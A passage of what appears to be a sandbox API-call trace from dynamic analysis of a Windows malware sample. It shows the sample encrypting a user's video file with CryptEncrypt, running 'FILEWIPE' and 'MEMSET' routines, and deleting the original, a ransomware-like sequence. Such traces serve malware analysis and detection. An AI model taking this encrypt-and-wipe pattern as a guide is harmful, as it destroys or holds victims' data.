lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0043.165] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.165] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0043.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0043.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0043.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0043.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0043.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0043.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0043.166] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.166] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0043.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0043.167] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.167] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0043.167] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0043.167] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.167] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.167] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.167] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.167] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.167] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.167] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.167] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.167] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0043.167] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.167] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.167] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.168] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.168] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.168] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0043.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.169] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x14e60, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x14e70) returned 1 [0043.169] CharLowerBuffW (in: lpsz="byte[85617]", cchLength=0xb | out: lpsz="byte[85617]") returned 0xb [0043.171] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.171] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.173] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.173] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95ecd8*, pdwDataLen=0x6ae220*=0x14e60, dwBufLen=0x14e70 | out: pbData=0x95ecd8*, pdwDataLen=0x6ae220*=0x14e70) returned 1 [0043.176] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0043.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.176] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.176] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.189] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0043.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.189] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.189] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0043.190] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.190] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.190] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.190] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.190] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.190] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.190] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.190] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0043.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.190] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.191] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0043.191] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.191] FreeLibrary (hLibModule=0x754b0000) returned 1 [0043.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0043.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0043.192] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0043.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0043.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.192] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4fbf200, ftCreationTime.dwHighDateTime=0x1d5c48f, ftLastAccessTime.dwLowDateTime=0x416a0950, ftLastAccessTime.dwHighDateTime=0x1d5c400, ftLastWriteTime.dwLowDateTime=0x416a0950, ftLastWriteTime.dwHighDateTime=0x1d5c400, nFileSizeHigh=0x0, nFileSizeLow=0x14e60, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ieBG H7.flv", cAlternateFileName="IEBGH7~1.FLV")) returned 0x7c2240 [0043.192] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0043.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.192] CharLowerBuffW (in: lpsz="byte[85600]", cchLength=0xb | out: lpsz="byte[85600]") returned 0xb [0043.193] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0043.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.193] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0043.193] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0043.193] FreeLibrary (hLibModule=0x76b40000) returned 1 [0043.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0043.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.194] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0043.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0043.194] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0043.194] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\iebg h7.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0043.196] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.196] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0043.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.196] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.197] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.197] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0043.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.197] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.197] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.197] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv", lpFilePart=0x0) returned 0x3f [0043.197] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4fbf200, ftCreationTime.dwHighDateTime=0x1d5c48f, ftLastAccessTime.dwLowDateTime=0x416a0950, ftLastAccessTime.dwHighDateTime=0x1d5c400, ftLastWriteTime.dwLowDateTime=0x197443e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14e60, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ieBG H7.flv", cAlternateFileName="IEBGH7~1.FLV")) returned 0x7c2240 [0043.197] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\iebg h7.flv")) returned 1 [0043.199] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4fbf200, ftCreationTime.dwHighDateTime=0x1d5c48f, ftLastAccessTime.dwLowDateTime=0x416a0950, ftLastAccessTime.dwHighDateTime=0x1d5c400, ftLastWriteTime.dwLowDateTime=0x197443e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14e60, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ieBG H7.flv", cAlternateFileName="IEBGH7~1.FLV")) returned 0 [0043.199] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.199] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 